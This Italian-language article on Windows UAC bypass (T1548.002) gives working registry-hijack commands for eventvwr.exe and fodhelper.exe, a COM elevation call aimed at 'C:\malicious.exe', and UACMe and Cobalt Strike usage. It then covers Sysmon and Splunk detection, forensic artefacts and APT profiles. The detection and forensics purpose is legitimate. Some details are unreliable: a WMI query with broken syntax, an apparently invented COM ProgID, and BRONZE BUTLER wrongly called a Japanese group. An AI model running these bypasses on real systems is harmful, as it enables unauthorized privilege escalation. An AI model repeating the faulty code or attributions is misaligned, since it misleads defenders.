Bypass UAC: Bypass User Account Control (T1548.002)

Il metodo più diretto per testare la vulnerabilità UAC utilizza eventvwr.exe, un binario Microsoft auto-elevato. Questo approccio sfrutta la ricerca di chiavi Registry mancanti per eseguire codice arbitrario.

Prima verifica il livello UAC corrente con: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

Per il bypass classico via eventvwr, crea la chiave Registry: reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f

Quindi esegui semplicemente eventvwr.exe - noterai cmd.exe aprirsi con privilegi elevati senza alcun prompt UAC. Questo funziona perché eventvwr cerca prima in HKCU prima di HKCR per l'handler mscfile.

Un approccio più sofisticato usa fodhelper.exe su Windows 10: reg add HKCU\Software\Classes\ms-settings\shell\open\command /ve /d "powershell.exe -windowstyle hidden -command Start-Process cmd.exe -Verb runAs" /f reg add HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /d "" /f fodhelper.exe

Per sistemi legacy, il metodo CMSTPLUA COM resta efficace. Usa PowerShell per invocare l'interfaccia COM: $cmstplua = New-Object -ComObject "CMSTPLUA.UAC.Elevator" $cmstplua.ElevateWithPath("C:\malicious.exe")

Tool automatizzati come UACMe includono oltre 70 bypass diversi. Esegui semplicemente: UACMe.exe 23 C:\Windows\System32\cmd.exe

Il numero indica il metodo specifico - 23 corrisponde a sdclt.exe su Windows 10. Per ambienti Red Team, Cobalt Strike integra moduli UAC bypass pronti all'uso tramite il comando elevate uac-token-duplication.

Testa sempre prima in laboratorio isolato, verificando che Windows Defender sia aggiornato per simulare condizioni realistiche.

La detection efficace richiede correlazione multi-evento piuttosto che singole signature. Il pattern critico da monitorare coinvolge modifiche Registry seguite da esecuzione di binari auto-elevati entro finestre temporali ristrette.

Configura Sysmon per catturare EventID 12 (Registry object added/deleted) filtrando specificamente: TargetObject contains "Classes\mscfile\shell\open\command" OR "Classes\ms-settings\shell\open\command"

Correlalo con EventID 1 (Process Create) dove ParentImage contiene eventvwr.exe, fodhelper.exe o computerdefaults.exe ma l'immagine figlio non è quella attesa. La finestra temporale ottimale è 30 secondi tra i due eventi.

Un approccio behavior-based monitora processi con token elevato ma parent process non elevato. Query WMI efficace: Get-WmiObject Win32_Process | Where {$.GetOwner().Domain -eq "NT AUTHORITY" -and $.ParentProcessId -ne 0}

Per ridurre falsi positivi, mantieni una whitelist di elevazioni legittime come Windows Update o software management tools. Processi critici da monitorare includono: sdclt.exe, WSReset.exe, slui.exe quando spawned da processi utente.

Windows Security Log fornisce EventID 4688 con token elevation type. Valore "%%1937" indica TokenElevationTypeFull senza prompt UAC - altamente sospetto se il parent process aveva TokenElevationTypeLimited.

Splunk query ottimizzata: index=windows EventCode=4688 TokenElevationType="%%1937" | transaction ProcessId maxspan=1m | where ParentTokenElevationType="%%1936"

Implementa anche monitoraggio per DLL hijacking in processi auto-elevati verificando hash non-Microsoft in directory di sistema.

L'analisi forense di bypass UAC richiede ricostruzione precisa delle modifiche Registry e correlazione con esecuzione processi. Gli artefatti principali risiedono in NTUSER.DAT dell'utente compromesso.

Estrai le chiavi Registry critiche da NTUSER.DAT usando RegRipper: rip.exe -r NTUSER.DAT -p uac_bypass

Cerca timestamp di creazione per:

• HKCU\Software\Classes\mscfile\shell\open\command
• HKCU\Software\Classes\ms-settings\shell\open\command
• HKCU\Environment\windir (per metodo environment variable)

ShimCache fornisce evidenze di esecuzione binari auto-elevati. Estrai con AppCompatCacheParser: AppCompatCacheParser.exe -f SYSTEM --csv timeline.csv

Filtra per eventvwr.exe, fodhelper.exe, computerdefaults.exe con timestamp anomali rispetto all'uso normale del sistema.

Prefetch files rivelano dettagli esecuzione: PECmd.exe -f C:\Windows\Prefetch\EVENTVWR.EXE-.pf*

Verifica "Files Referenced" per DLL o eseguibili non standard caricati durante il bypass.

L'Event Log Microsoft-Windows-UAC/Operational contiene EventID 1 per elevazioni. Confronta con Microsoft-Windows-UAC-FileVirtualization/Operational per tentativi di scrittura in location protette.

Campagna Operation Honeybee ha lasciato tracce distintive: NTWDBLIB.DLL malevola in System32 con timestamp modification antedatato, seguito da esecuzione cliconfig.exe per bypass. Pattern temporale: modifica DLL → attesa 2-5 minuti → esecuzione cliconfig → payload elevato entro 30 secondi.

Memory forensics con Volatility identifica processi con token manipulation: vol.py -f memory.dmp windows.privileges | grep SeDebugPrivilege

Cerca processi utente con privilegi amministrativi anomali senza corrispondente consent.exe nella process tree.

APT29 (Cozy Bear) preferisce metodi UAC bypass sofisticati integrati in toolchain personalizzate. Il gruppo russo utilizza prevalentemente DLL hijacking su binari Microsoft legittimi, con particolare predilezione per migwiz.exe. Post-bypass, deployano tipicamente Cobalt Strike con named pipe customizzate per command and control.

Threat Group-3390 (Emissary Panda) mantiene arsenale di tool pubblici incluso UACMe. Caratteristica distintiva: utilizzano sempre almeno due metodi bypass diversi nella stessa campagna per ridondanza. Dopo elevazione, installano persistenza via servizi Windows con nomi che mimano software legittimi cinesi.

APT37 (Reaper) integra bypass UAC direttamente nel dropper iniziale, non come modulo separato. Utilizzano prevalentemente metodo eventvwr.exe ma con obfuscazione PowerShell heavy. Pattern ricorrente: bypass UAC → disable Windows Defender → deploy KONNI malware family.

BRONZE BUTLER sviluppa tool specifici per Windows 10, indicando capacità di reverse engineering avanzate. Il gruppo giapponese testa estensivamente in lab prima del deployment - raramente falliscono bypass in ambiente target. Post-elevazione, focusing su credential dumping via Mimikatz variants.

MuddyWater ruota tecniche UAC bypass frequentemente, probabilmente monitorando detection pubbliche. Il gruppo iraniano combina bypass con living-off-the-land binaries per mantenere footprint minimo. Evoluzione tattica: da PowerShell-based (2018-2020) a COM-based methods (2021-presente).

Trend emergente: gruppi APT migrano verso Token Manipulation piuttosto che bypass tradizionali. LockBit ransomware groups già implementano stolen token techniques. Prevediamo shift industry-wide entro 12-18 mesi verso privilege escalation che non tocca Registry, rendendo detection tradizionale obsoleta.

Tecnica documentata in MITRE ATT&CK framework T1548.002 con coverage di 11 gruppi APT e 49 malware families. Campagna Operation Honeybee (2017-2018) primo uso documentato NTWDBLIB.DLL per bypass via cliconfig.exe. Repository UACME GitHub riferimento definitivo per bypass methods. Detection strategy DET0388 correlazione multi-evento Registry e process execution.